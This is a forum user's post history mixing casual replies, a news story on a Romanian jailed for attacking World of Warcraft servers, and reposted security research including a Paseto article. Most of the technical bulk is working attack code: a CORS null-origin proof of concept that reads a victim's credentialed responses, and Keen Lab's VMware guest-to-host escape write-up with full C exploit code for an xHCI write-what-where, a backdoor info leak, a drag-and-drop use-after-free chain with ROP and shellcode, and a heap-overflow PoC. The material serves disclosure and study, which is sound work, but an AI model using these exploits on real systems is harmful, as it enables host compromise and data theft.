Everything posted by Nytro
-
Nice. But I'm wondering whether I should delete this link, because I have a feeling it's going to steal some of our users...
-
Fixed in 4.3.2 by IPBoard. Thanks, kronzy.
-
It's valid (self) for those who don't trust it.
-
A Romanian who launched a cyberattack against the California servers of the hugely popular video game "World of Warcraft" (WoW), in revenge over a dispute with another online player, was sentenced on Monday to one year in prison in the United States, AFP reports, cited by Agerpres. Photo: Gulliver/Getty Images. Călin Mateiaş, 38 years old and originally from Bucharest, was extradited to the United States after he flooded the servers of this online video game in 2010 with such a large number of connection requests that "World of Warcraft" became inaccessible to thousands of other players around the world. "Angry at a player with whom he regularly played this game, the defendant was determined to make his 'WoW' opponents lose by shutting down the servers, so that they could no longer access the online game," prosecutors wrote in documents filed with a US court. "His actions were motivated by a juvenile desire to win this game and to see the others lose," according to the same source. In February, Călin Mateiaş pleaded guilty before a Los Angeles court after being charged with intentionally damaging a protected computer. Last month, he paid 30,000 dollars to Blizzard Entertainment, the publisher of "World of Warcraft". As a result, the US authorities dropped a separate case opened in the state of Pennsylvania, in which Călin Mateiaş was accused of computer hacking. Source: https://www.digi24.ro/stiri/externe/sua/un-roman-care-a-piratat-jocul-video-world-of-warcraft-a-fost-condamnat-la-un-an-de-inchisoare-925552?
-
Nice answer. Honestly, I wasn't expecting that.
-
So I take it everyone is doing well now, right? Anyway, apart from these cases, which are probably few, did anyone among those who got into this later actually get rich?
-
Out of curiosity, who around here has made at least a few thousand euros from Bitcoin or other coins?
-
Monday, 23 April 2018

Exploiting misconfigured CORS Null Origin

Almost two years ago, in October 2016, James Kettle published an excellent blog post about the various types of Cross-Origin Resource Sharing (CORS) misconfigurations and how they can be exploited. Recently, I encountered a web application that allowed two-way interaction with the so-called null origin. More precisely, when sending an HTTP request specifying the header:

```
Origin: null
```

the server would respond with the following two HTTP headers:

```
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
```

This configuration allows us to issue arbitrary requests to the application as long as we can set the Origin header to null. According to Kettle's blog post, it can be exploited by issuing the request from within an iframe using a data URL, as follows:

```html
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>*cors stuff here*</script>'></iframe>
```

Although the code above gives a hint in the right direction, it falls short of a complete proof of concept. I struggled to find code that would work across both Chrome and Firefox, but eventually succeeded with the following snippet:

```html
<html>
<body>
<iframe src='data:text/html,<script>
var xhr = new XMLHttpRequest();
xhr.open("GET", "https://vuln-app.com/confidential", true);
xhr.withCredentials = true;
xhr.onload = function () {
  if (xhr.readyState === xhr.DONE) {
    console.log(xhr.response);
  }
};
xhr.send(null);
</script>'></iframe>
</body>
</html>
```

As soon as the page above is opened, a request to https://vuln-app.com/confidential should be issued with an Origin: null HTTP header, and the corresponding HTTP response should be shown in the browser console.

Source: https://www.soffensive.com/2018/04/exploiting-misconfigured-cors-null.html
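As a quick triage step before building the iframe PoC above, the misconfiguration can be detected from the response headers alone. A minimal sketch in Python (the URL is a placeholder; `probe` assumes the endpoint is reachable, while the header check itself is pure logic):

```python
from urllib.request import Request, urlopen

def is_null_origin_exploitable(headers: dict) -> bool:
    """True only for the exploitable combination: the null origin is
    reflected AND credentials are allowed."""
    h = {k.lower(): v for k, v in headers.items()}
    return (h.get("access-control-allow-origin") == "null"
            and h.get("access-control-allow-credentials", "").lower() == "true")

def probe(url: str) -> bool:
    # Send the same "Origin: null" header a sandboxed data-URL iframe would send.
    req = Request(url, headers={"Origin": "null"})
    with urlopen(req) as resp:
        return is_null_origin_exploitable(dict(resp.headers))
```

If `is_null_origin_exploitable` returns True for a response, the two-way interaction described above should work from the sandboxed iframe.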
-
A bunch of Red Pills: VMware Escapes
by Marco Grassi, Azureyang, Jackyxty

Background

VMware is one of the leaders in virtualization nowadays. They offer VMware ESXi for the cloud, and VMware Workstation and Fusion for desktops (Windows, Linux, macOS). The technology is very well known to the public: it allows users to run unmodified guest "virtual machines". Often those virtual machines are not trusted, and they must be isolated. VMware goes to great lengths to offer this isolation, especially on the ESXi product, where virtual machines of different actors can potentially run on the same hardware. So strong isolation is of paramount importance.

Recently the "Virtualization" category was introduced at Pwn2Own, and VMware has been among the targets since Pwn2Own 2016. In 2017 we successfully demonstrated a VMware escape from a guest to the host from an unprivileged account, resulting in code execution on the host and breaking out of the virtual machine. If you escape your virtual machine environment, all isolation assurances are lost, since you are running code on the host, which controls the guests.

But how does VMware work? In a nutshell, it often uses (though they are not strictly required) CPU and memory hardware virtualization technologies, so a guest virtual machine can run code at native speed most of the time. But a modern system is not just a CPU and memory; it also requires a lot of other hardware to work properly and be useful. This point is very important because it constitutes one of the biggest attack surfaces of VMware: the virtualized hardware. Virtualizing a hardware device is not a trivial task, as is easily realized by reading any datasheet for the hardware/software interface of a PC hardware device. VMware will trap on I/O accesses to such a virtual device and needs to emulate all those low-level operations correctly; since it aims to run unmodified kernels, its emulated devices must behave as closely as possible to their real counterparts.
Furthermore, if you have ever used VMware you might have noticed its copy-paste capabilities and shared folders. How are those implemented?

To summarize, in this blog post we will cover quite a few bugs: several in the "backdoor" functionality that supports those "extra" services such as copy and paste, and one in a virtualized device. Although a lot of VMware blog posts and presentations have been released recently, we felt the need to write our own for the following reasons: first, no one has ever talked correctly about our Pwn2Own bugs, so we want to shed light on them; second, some of those published resources lack either details or code. So we hope you will enjoy our blog post! We will begin with some background information to get you up to speed. Let's get started!

Overall architecture

A complex product like VMware consists of several components; we will just highlight the most important ones, since the VMware architecture design has already been discussed extensively elsewhere.

VMM: this piece of software runs at the highest possible privilege level on the physical machine. It makes the VMs tick and run, and also handles all the tasks which are impossible to perform from host ring 3, for example.
vmnat: vmnat is responsible for network packet handling, since VMware offers advanced functionalities such as NAT and virtual networks.
vmware-vmx: every virtual machine started on the system has its own vmware-vmx process running on the host. This process handles many tasks which are relevant for this blog post, including much of the device emulation and backdoor request handling. Exploiting the chains we will present results in code execution on the host in the context of vmware-vmx.

Backdoor

The so-called backdoor is not actually a "backdoor": it is simply a mechanism implemented in VMware for guest-host and host-guest communication. A useful resource for understanding this interface is the open-vm-tools repository published by VMware itself.
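The guest reaches this interface through a magic-number handshake on dedicated I/O ports. As a small aside, the magic constants themselves spell out readable ASCII, which is handy when spotting backdoor calls in disassembly. A minimal sketch (the constant values are taken from open-vm-tools' backdoor_def.h; the helper function is our own):

```python
# Constants as published in open-vm-tools (backdoor_def.h).
BDOOR_MAGIC = 0x564D5868   # loaded into EAX before the IN instruction
BDOOR_PORT = 0x5658        # "traditional" channel
BDOORHB_PORT = 0x5659      # "high bandwidth" channel

def to_ascii(value: int, nbytes: int) -> str:
    """Decode a magic constant to the ASCII string hidden in its bytes."""
    return value.to_bytes(nbytes, "big").decode("ascii")

# The magic is "VMXh" and the traditional port is literally "VX".
print(to_ascii(BDOOR_MAGIC, 4), hex(BDOOR_PORT), to_ascii(BDOOR_PORT, 2))
```

The actual in/out instructions are trapped by the hypervisor, which is why a ring-3 guest process can use this channel at all; the snippet above only illustrates the constants involved.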
Basically, at the lowest level, the backdoor consists of two I/O ports, 0x5658 and 0x5659: the first for "traditional" communication, the other for "high bandwidth" communication. The guest issues in/out instructions on those ports following a register convention, and is thereby able to communicate with the VMware software running on the host. The hypervisor traps and services the requests. On top of this low-level mechanism, VMware implemented some more convenient high-level protocols; we encourage you to check the open-vm-tools repository to discover these. Since they have been covered extensively elsewhere, we will not spend too much time on the details. Just to mention a few of those higher-level protocols: drag and drop, copy and paste, guestrpc. The fundamental points to remember are:

It's a guest-host interface that we can use.
It exposes complex services and functionalities.
Many of these functionalities can be used from ring 3 in the guest VM.

xHCI

xHCI (aka eXtensible Host Controller Interface) is a specification by Intel of a USB host controller (normally implemented in hardware in a regular PC) which supports USB 1.x, 2.0 and 3.x. You can find the relevant specification here. On a physical machine it's often present:

```
00:14.0 USB controller: Intel Corporation C610/X99 series chipset USB xHCI Host Controller (rev 05)
```

In VMware this hardware device is emulated, and if you create a Windows 10 virtual machine, this emulated controller is enabled by default, so a guest virtual machine can interact with this particular emulated device. The interaction, as with many hardware devices, takes place in the PCI memory space and in the memory-mapped I/O space. This very low-level interface is the one used by the OS kernel driver in order to schedule USB work, receive data, and perform all the other tasks related to USB.
Just by looking at the specification alone, which runs to more than 600 pages, it's no surprise that this piece of hardware and its interface are very complex; and the specification covers only the interface and the behavior, not the actual implementation. Now imagine actually emulating this complex hardware. You can imagine it's a very complex and error-prone task, as we will see soon. Often, to speak directly with the hardware (and, by consequence, with virtualized hardware), you need to run in ring 0 in the guest. That's why (as you will see in the next paragraphs) we used a Windows kernel LPE inside the VM.

Mitigations

VMware ships with the "baseline" mitigations expected in modern software, such as ASLR, stack cookies, etc. More advanced Windows mitigations such as CFG (Microsoft's version of Control Flow Integrity) and others were not deployed at the time of writing.

Pwn2Own 2017: VMware Escape by two bugs in 1 second

"Team Sniper (Keen Lab and PC Mgr) targeting VMware Workstation (Guest-to-Host), and the event certainly did not end with a whimper. They used a three-bug chain to win the Virtual Machine Escapes (Guest-to-Host) category with a VMware Workstation exploit. This involved a Windows kernel UAF, a Workstation infoleak, and an uninitialized buffer in Workstation to go guest-to-host. This category ratcheted up the difficulty even further because VMware Tools were not installed in the guest." (ZDI, The Security Landscape: Pwn2Own 2017)

The following vulnerabilities were identified and analyzed:

CVE-2017-4904 (critical): xHCI uninitialized stack value leading to arbitrary code execution
CVE-2017-4905 (moderate): uninitialized memory read leading to information disclosure

(ZDI, The Results: Pwn2Own 2017 Day Three)

CVE-2017-4904: xHCI uninitialized stack variable

This is an uninitialized variable vulnerability residing in the emulated xHCI device, triggered when changes to a Device Context are written back to guest physical memory.
The xHCI reports status information to system software through the "Device Context" structure. The address of a Device Context is held in the DCBAA (Device Context Base Address Array), whose address is in turn held in the DCBAAP (Device Context Base Address Array Pointer) register. Both the Device Context and the DCBAA reside in physical RAM. The xHCI device keeps an internal cache of the Device Context and only updates the copy in physical memory when changes occur.

When updating the Device Context, the virtual machine monitor maps the guest physical memory containing the Device Context into the address space of the monitor process, then performs the update. However, the mapping can fail and leave the result variable untouched. The code takes no precaution against this and directly uses the result as a destination address for a memory write, yielding an uninitialized variable vulnerability. To trigger this bug, the following steps should be taken:

1. Issue an "Enable Slot" command to the xHCI.
2. Get the resulting slot number from the Event TRB.
3. Set the DCBAAP to point to a controlled buffer.
4. Put an invalid physical address, e.g. 0xffffffffffffffff, into the corresponding slot in the DCBAA buffer.
5. Issue an "Address Device" command. The xHCI reads the base address of the Device Context from the DCBAA into an internal cache; this value is a controlled, invalid address.
6. Issue a "Configure Endpoint" command. The bug triggers when the xHCI updates the corresponding Device Context.

The uninitialized variable resides on the stack. Its value can be controlled in the "Configure Endpoint" command through one of the Endpoint Contexts of the Input Context, which is also on the stack. Therefore we control the destination address of the write. The contents to be written come from the Endpoint Context of the Device Context, which is copied from the corresponding controllable Endpoint Context of the Input Context, resulting in a write-what-where primitive.
By combining this with the info leak vulnerability, we can overwrite some function pointers and finally ROP our way to arbitrary code execution.

Exploit code:

```c
void write_what_where(uint64 xhci_base, uint64 where, uint64 what)
{
    xhci_cap_regs *cap_regs = (xhci_cap_regs *)xhci_base;
    xhci_op_regs *op_regs = (xhci_op_regs *)(xhci_base + (cap_regs->hc_capbase & 0xff));
    xhci_doorbell_array *db = (xhci_doorbell_array *)(xhci_base + cap_regs->db_off);
    int max_slots = cap_regs->hcs_params1 & 0xf;
    uint8 *playground = (uint8 *)ExAllocatePoolWithTag(NonPagedPool, 0x1000, 'NEEK');
    if (!playground)
        return;
    playground[0] = 0;
    uint64 *dcbaa = (uint64 *)playground;
    playground += sizeof(uint64) * max_slots;
    for (int i = 0; i < max_slots; ++i)
    {
        dcbaa[i] = 0xffffffffffffffc0;
    }
    op_regs->dcbaa_ptr = MmGetPhysicalAddress(dcbaa).QuadPart;
    playground = (uint8 *)(((uint64)playground + 0x10) & (~0xf));
    input_context *input_ctx = (input_context *)playground;
    playground += sizeof(input_context);
    playground = (uint8 *)(((uint64)playground + 0x40) & (~0x3f));
    uint8 *cring = playground;
    uint64 cmd_ring = MmGetPhysicalAddress(cring).QuadPart | 1;
    trb_t *cmd = (trb_t *)cring;
    memset((void *)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ENABLE_SLOT);
    TRB_SET(C, cmd, 1);
    cmd++;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = 3;
    input_ctx->slot_ctx.context_entries = 1;
    memset((void *)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_ADDRESS_DEV);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 1);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db->doorbell[0] = 0;            /* ring doorbell 0 */
    cmd = (trb_t *)cring;
    memset(input_ctx, 0, sizeof(input_context));
    input_ctx->ctrl_ctx.drop_flags = 0;
    input_ctx->ctrl_ctx.add_flags = (1u << 31) | (1u << 30);
    input_ctx->slot_ctx.context_entries = 31;
    uint64 *value = (uint64 *)(&input_ctx->ep_ctx[30]);
    uint64 *addr = ((uint64 *)(&input_ctx->ep_ctx[31])) + 1;
    value[0] = 0;
    value[1] = what;
    value[2] = 0;
    addr[0] = where - 0x3b8;
    memset((void *)cmd, 0, sizeof(trb_t));
    TRB_SET(TT, cmd, TRB_CMD_CONFIGURE_EP);
    TRB_SET(ID, cmd, 1);
    TRB_SET(DC, cmd, 0);
    cmd->ptr = MmGetPhysicalAddress(input_ctx).QuadPart;
    TRB_SET(C, cmd, 1);
    cmd++;
    TRB_SET(C, cmd, 0);
    op_regs->cmd_ring = cmd_ring;
    db->doorbell[0] = 0;            /* ring doorbell 0, triggering the bug */
}
```

CVE-2017-4905: Backdoor uninitialized memory read

This is an uninitialized memory vulnerability present in the backdoor callback handler. A buffer is allocated on the stack when processing backdoor requests. This buffer should be initialized in the BDOORHB callback, but when an invalid command is requested, the callback fails to properly clear the buffer, causing uninitialized contents of the stack buffer to be leaked to the guest. With this bug we can effectively defeat the ASLR of the vmware-vmx process running on the host. The success rate of exploiting this bug is 100%. Credits to JunMao of Tencent PCManager.

PoC:

```c
void infoleak()
{
    char *buf = (char *)VirtualAlloc(0, 0x8000, MEM_COMMIT, PAGE_READWRITE);
    memset(buf, 0, 0x8000);
    Backdoor_proto_hb hb;
    memset(&hb, 0, sizeof(Backdoor_proto_hb));
    hb.in.size = 0x8000;
    hb.in.dstAddr = (uintptr_t)buf;
    hb.in.bx.halfs.low = 2;
    Backdoor_HbIn(&hb);
    // buf will be filled with contents leaked from the vmware-vmx stack
    // ...
    VirtualFree((void *)buf, 0x8000, MEM_DECOMMIT);
    return;
}
```

Behind the scenes of Pwn2Own 2017: exploiting the UAF bug in VMware Workstation drag and drop with a single bug

By fuzzing VMware Workstation, we found this bug and completed the whole stable exploit chain using this single bug in the last few days of February 2017. Unfortunately, the bug was patched in VMware Workstation 12.5.3, released on 9 March 2017.
Afterwards, we noticed that few papers talked about this bug, and VMware never even assigned a CVE id to it. That's a pity, because it's the best bug we have ever seen in VMware Workstation, and VMware just patched it quietly. Now we're going to talk about the way to exploit VMware Workstation with this single bug.

Exploit Code

The success rate of this exploit is approximately 100%.

```c
char *initial_dnd = "tools.capability.dnd_version 4";
static const int cbObj = 0x100;
char *second_dnd = "tools.capability.dnd_version 2";
char *chgver = "vmx.capability.dnd_version";
char *call_transport = "dnd.transport ";
char *readstring = "ToolsAutoInstallGetParams";

typedef struct _DnDCPMsgHdrV4
{
    char magic[14];
    char dummy[2];
    size_t ropper[13];
    char shellcode[175];
    char padding[0x80];
} DnDCPMsgHdrV4;

void PrepareLFH()
{
    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    for (int idx = 0; idx < 1; ++idx) // just occupy 1
    {
        char *spary = stringf("info-set guestinfo.k%d %s", idx, pObj);
        RpcOut_SendOneRaw(spary, strlen(spary), &result, NULL); // alloc one to occupy 4
    }
    free(pObj);
}

size_t infoleak()
{
#define MAX_LFH_BLOCK 512
    Message_Channel *chans[5] = {0};
    for (int i = 0; i < 5; ++i)
    {
        chans[i] = Message_Open(0x49435052);
        if (chans[i])
        {
            Message_SendSize(chans[i], cbObj - 1); // just alloc
        }
        else
        {
            Message_Close(chans[i - 1]); // keep 1 channel valid
            chans[i - 1] = 0;
            break;
        }
    }
    PrepareLFH(); // make sure we have at least 7 holes, or open and occupy the next LFH block
    for (int i = 0; i < 5; ++i)
    {
        if (chans[i])
        {
            Message_Close(chans[i]);
        }
    }
    char *result = NULL;
    char *pObj = malloc(cbObj);
    memset(pObj, 'A', cbObj);
    pObj[cbObj - 1] = 0;
    char *spary2 = stringf("guest.upgrader_send_cmd_line_args %s", pObj);
    while (1)
    {
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        }
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            if (chan == NULL)
            {
                puts("Message send error!");
                Sleep(100);
            }
            else
            {
                Message_SendSize(chan, cbObj - 1);
                Message_RawSend(chan, "\xA0\x75", 2); // just ret
                Message_Close(chan);
            }
        }
        Message_Channel *chan = Message_Open(0x49435052);
        Message_SendSize(chan, cbObj - 1);
        Message_RawSend(chan, "\xA0\x74", 2); // free
        RpcOut_SendOneRaw(dndtransport, strlen(dndtransport), &result, NULL); // trigger double free
        for (int i = 0; i < min(cbObj - 3, MAX_LFH_BLOCK); ++i)
        {
            RpcOut_SendOneRaw(spary2, strlen(spary2), &result, NULL);
            Message_RawSend(chan, "B", 1);
            RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
            if (result[0] == 'A' && result[1] == 'A' && strcmp(result, pObj))
            {
                Message_Close(chan); // free the string
                for (int i = 0; i < MAX_LFH_BLOCK; ++i)
                {
                    puts("Trying to leak vtable");
                    RpcOut_SendOneRaw(tov4, strlen(tov4), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                    RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
                    size_t p = 0;
                    if (result)
                    {
                        memcpy(&p, result, min(strlen(result), 8));
                        printf("Leak content: %p\n", p);
                    }
                    size_t low = p & 0xFFFF;
                    if (low == 0x74A8 || // RpcBase
                        low == 0x74d0 || // CpV4
                        low == 0x7630)   // DnDV4
                    {
                        printf("vmware-vmx base: %p\n", (p & (~0xFFFF)) - 0x7a0000);
                        return (p & (~0xFFFF)) - 0x7a0000;
                    }
                    RpcOut_SendOneRaw(tov2, strlen(tov2), &result, NULL);
                    RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
                }
            }
        }
        Message_Close(chan);
    }
    return 0;
}

void exploit(size_t base)
{
    char *result = NULL;
    char *uptime_info = stringf("SetGuestInfo -7-%I64u", 0x41414141);
    char *pObj = malloc(cbObj);
    memset(pObj, 0, cbObj);
    DnDCPMsgHdrV4 *hdr = malloc(sizeof(DnDCPMsgHdrV4));
    memset(hdr, 0, sizeof(DnDCPMsgHdrV4));
    memcpy(hdr->magic, call_transport, strlen(call_transport));
    while (1)
    {
        RpcOut_SendOneRaw(second_dnd, strlen(second_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
        for (int i = 0; i < MAX_LFH_BLOCK; ++i)
        {
            Message_Channel *chan = Message_Open(0x49435052);
            Message_SendSize(chan, cbObj - 1);
            size_t fake_vtable[] = {
                base + 0xB87340, base + 0xB87340,
                base + 0xB87340, base + 0xB87340};
            memcpy(pObj, &fake_vtable, sizeof(size_t) * 4);
            Message_RawSend(chan, pObj, sizeof(size_t) * 4);
            Message_Close(chan);
        }
        RpcOut_SendOneRaw(uptime_info, strlen(uptime_info), &result, NULL);
        RpcOut_SendOneRaw(hdr, sizeof(DnDCPMsgHdrV4), &result, NULL);
        // check pwn success?
        RpcOut_SendOneRaw(readstring, strlen(readstring), &result, NULL);
        if (*(size_t *)result == 0xdeadbeefc0debabe)
        {
            puts("VMware escape success! \nPwned by KeenLab, Tencent");
            RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL); // fix dnd to callable, prevent vmtoolsd problem
            RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
            return;
        }
        // host dndv4 fill in, try to clean up and free again
        Sleep(100);
        puts("Object wrong! Retry...");
        RpcOut_SendOneRaw(initial_dnd, strlen(initial_dnd), &result, NULL);
        RpcOut_SendOneRaw(chgver, strlen(chgver), &result, NULL);
    }
}

int main(int argc, char *argv[])
{
    int ret = 1;
    __try
    {
        while (1)
        {
            size_t base = 0;
            do
            {
                puts("Leaking...");
                base = infoleak();
            } while (!base);
            puts("Pwning...");
            exploit(base);
            break;
        }
    }
    __except (ExceptionIsBackdoor(GetExceptionInformation())
                  ? EXCEPTION_EXECUTE_HANDLER
                  : EXCEPTION_CONTINUE_SEARCH)
    {
        fprintf(stderr, NOT_VMWARE_ERROR);
        return 1;
    }
    return ret;
}
```

CVE-2017-4901: DnDv3 heap overflow

"The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion." (VMware Workstation and Fusion updates address out-of-bounds memory access vulnerability, www.vmware.com/security/advisories/VMSA-2017-0005.html)

After VMware released 12.5.3, we continued auditing the DnD code and finally found another heap overflow bug similar to CVE-2016-7461. This bug was known to almost every participant in the VMware category at Pwn2Own 2017. Here we present the PoC of this bug.
```c
void poc()
{
    int n;
    char *req1 = "tools.capability.dnd_version 3";
    char *req2 = "vmx.capability.dnd_version";
    RpcOut_SendOneRaw(req1, strlen(req1), NULL, NULL);
    RpcOut_SendOneRaw(req2, strlen(req2), NULL, NULL);

    char req3[0x80] = "dnd.transport ";
    n = strlen(req3);
    *(int *)(req3 + n) = 3;
    *(int *)(req3 + n + 4) = 0;
    *(int *)(req3 + n + 8) = 0x100;
    *(int *)(req3 + n + 0xc) = 0;
    *(int *)(req3 + n + 0x10) = 0;
    // allocate a buffer of 0x100 bytes
    RpcOut_SendOneRaw(req3, n + 0x14, NULL, NULL);

    char req4[0x1000] = "dnd.transport ";
    n = strlen(req4);
    *(int *)(req4 + n) = 3;
    *(int *)(req4 + n + 4) = 0;
    *(int *)(req4 + n + 8) = 0x1000;
    *(int *)(req4 + n + 0xc) = 0x800;
    *(int *)(req4 + n + 0x10) = 0;
    for (int i = 0; i < 0x800; ++i)
        req4[n + 0x14 + i] = 'A';
    // overflow with 0x800 bytes of 'A'
    RpcOut_SendOneRaw(req4, n + 0x14 + 0x800, NULL, NULL);
}
```

Conclusions

In this article we presented several VMware bugs leading to guest-to-host virtual machine escapes. We hope to have demonstrated that VM breakouts are not only possible and real, but also that a determined attacker can achieve several of them, and with good reliability. We feel that in our industry there is a misconception that if untrusted software runs inside a VM, then we are safe. Think about the malware industry, which heavily relies on VMs for analysis, or the entire cloud, which basically runs on hypervisors. Virtualization is certainly an additional protection layer, raising the bar for an attacker to achieve full compromise, so adopting it is very good practice. But we must not forget that it is essentially just another "layer of sandboxing" which can be bypassed or escaped. So great care must be taken to secure this layer as well.

Source: https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/
-
Exploiting CVE-2018-1038 - Total Meltdown

Posted on 23rd April 2018. Tagged in exploit, windows, kernel

Back in March, a vulnerability affecting Windows 7 and Server 2008 R2 was disclosed by Ulf Frisk. The vulnerability is pretty awesome: a patch released by Microsoft to mitigate the Meltdown vulnerability inadvertently opened up a hole on these versions of Windows, allowing any process to access and modify page table entries. The writeup of the vulnerability can be found over on Ulf's blog here, and is well worth a read. This week I had some free time, so I decided to dig into the vulnerability and see just how the issue manifested itself. The aim was to create a quick exploit which could be used to elevate privileges during an assessment. I ended up delving into Windows memory management more than I had before, so this post was created to walk through just how an exploit can be crafted for this kind of vulnerability. As always, this post is for people looking to learn about exploitation techniques rather than simply providing a ready-to-fire exploit. With that said, let's start with some paging fundamentals.

Full article: https://blog.xpnsec.com/total-meltdown-cve-2018-1038/
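The reason "any process" can reach page table entries at all is that Windows 7 x64 maps its page tables through a PML4 self-reference entry at the fixed index 0x1ed (no randomization), so every PTE lives at a predictable virtual address; the faulty patch marked that mapping user-accessible. A sketch of the address arithmetic, with constants as described in Ulf Frisk's writeup (this only computes addresses; it does not touch memory):

```python
SELF_REF = 0x1ED  # fixed PML4 self-reference index on Windows 7 x64
# Walking the self-reference once puts you in the PTE region:
PTE_BASE = (0xFFFF << 48) | (SELF_REF << 39)   # 0xFFFFF68000000000

def pte_va(va: int) -> int:
    """Virtual address of the PTE mapping `va`, via the self-referencing PML4 slot:
    replace the PML4 index with 0x1ed and shift the remaining indices down one level."""
    return PTE_BASE + ((va >> 12) & 0xFFFFFFFFF) * 8

def pde_va(va: int) -> int:
    """One paging level up: the PDE mapping `va` is the PTE of the PTE address."""
    return pte_va(pte_va(va))
```

For example, `pte_va(0)` is 0xFFFFF68000000000 and `pde_va(0)` is 0xFFFFF6FB40000000, the well-known Windows 7 PTE and PDE base addresses; with CVE-2018-1038 these addresses were readable and writable from user mode.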
-
-
Paseto is a Secure Alternative to the JOSE Standards (JWT, etc.)

March 4, 2018 6:25 pm, by Scott Arciszewski, Open Source

This is a follow-up to our 2017 blog post that made the case for avoiding JSON Web Tokens (JWT) and its related standards. Many developers responded to our post with the same question: "What should we use instead of JWT?" Today, I'm happy to announce a viable replacement.

Introducing PASETO: Platform-Agnostic SEcurity TOkens

The JOSE standards (of which JWT is a subset) give developers enough rope to hang themselves: Do you encrypt? Do you sign? Which algorithms do you support? Is "none" a valid authentication algorithm? Why not let the token specify which algorithm to use to validate tokens? As time went on and more vulnerabilities were discovered in the JOSE standards, the companies and enthusiasts that maintained the JWT libraries in various languages did work around these vulnerabilities, to their credit. However, this is at best a brittle solution. Consider the case of RNCryptor: the PHP implementation uses authenticated encryption and resists timing attacks, but the Haskell implementation just outright skips HMAC validation. The most effective way to solve security problems at an ecosystem level is to design less error-prone standards. Libraries that implement safer standards will not need to play catch-up with what the mainline implementations are doing. That is why we made Paseto, which exposes JWT-like validation claims without any of the runtime protocol negotiation and cryptographic protocol joinery that caused so many critical JWT security failures.

JWT's Knobs and Levers

Are you signing or encrypting? Both? Neither?
What algorithm is being used for signing? (Public-key and shared-key algorithms are easily confused here, and you are able to choose dangerous options like RSA with PKCS #1 v1.5 padding.)
What algorithm is being used for message encryption?
What algorithm is being used for key encryption?
As for the real-world use cases for including the encryption key with the ciphertext, encrypted or not, your guess is as good as mine. This might make more sense if key encryption algorithms only included public-key cryptography, but of course, AES-GCM is explicitly allowed by the standard.

Paseto's Options

What version?
  v1 gives you RSASSA-PSS and AES-CTR+HMAC-SHA2
  v2 gives you libsodium
Is this token local or public?
  local: shared-key authenticated encryption
  public: public-key digital signatures

That's it. There are no levers to pull, buttons to push, or knobs to fiddle with. You don't have to worry about the complexity required to use RSA safely. You don't have to worry whether the public key for a given message is even on the curve. Paseto is simple, obviously secure, and solves 99% of the use cases for JSON Web Tokens. There is no guesswork; the cryptography aims to be boring. You can port Paseto to another language in hundreds, not thousands, of lines of code (especially if you only aim for v2 support). The Paseto documentation, as well as a reference implementation written in PHP, is available on GitHub.

The Design and Motivation for Paseto

Paseto is to JWT what Halite was to the various mcrypt-based cryptography libraries in the PHP ecosystem. That is to say, we identified a source of insecurity for the Internet and worked to replace it with something that would lead to better security. All of our software is developed with the same underlying philosophy:

Secure by default
Simple and easy to use
Easy to analyze and reason about (for implementors, auditors, and security researchers)

However, we need to emphasize another point that isn't obvious until you have sufficient cryptography engineering experience: ciphersuite agility is harmful. A full discussion of why this is true deserves a blog post of its own, but in a nutshell, it introduces the risk of downgrade attacks (e.g. DROWN).
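The "no knobs" property can be made concrete on the consuming side: a Paseto verifier pins exactly the version/purpose pairs it deploys and rejects everything else before any cryptography runs. A minimal sketch in Python (the `version.purpose.payload[.footer]` layout is from the Paseto specification; the allowlist and function names are our own, and real validation would of course go on to decrypt or verify the payload):

```python
# The one (or few) protocols this deployment speaks; an application choice,
# not something the token gets to negotiate.
ALLOWED = {("v2", "local")}

def accept_token_header(token: str) -> tuple:
    """Parse a Paseto-style header and enforce the allowlist up front."""
    parts = token.split(".")
    if len(parts) not in (3, 4):   # version.purpose.payload[.footer]
        raise ValueError("malformed token")
    header = (parts[0], parts[1])
    if header not in ALLOWED:
        # No negotiation, no downgrade: anything else is rejected outright.
        raise ValueError("unsupported protocol version/purpose")
    return header
```

Contrast this with JOSE, where the token's own `alg` field steers validation; here the verifier's configuration is two constants, and a future v3 rollout is a one-line allowlist change.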
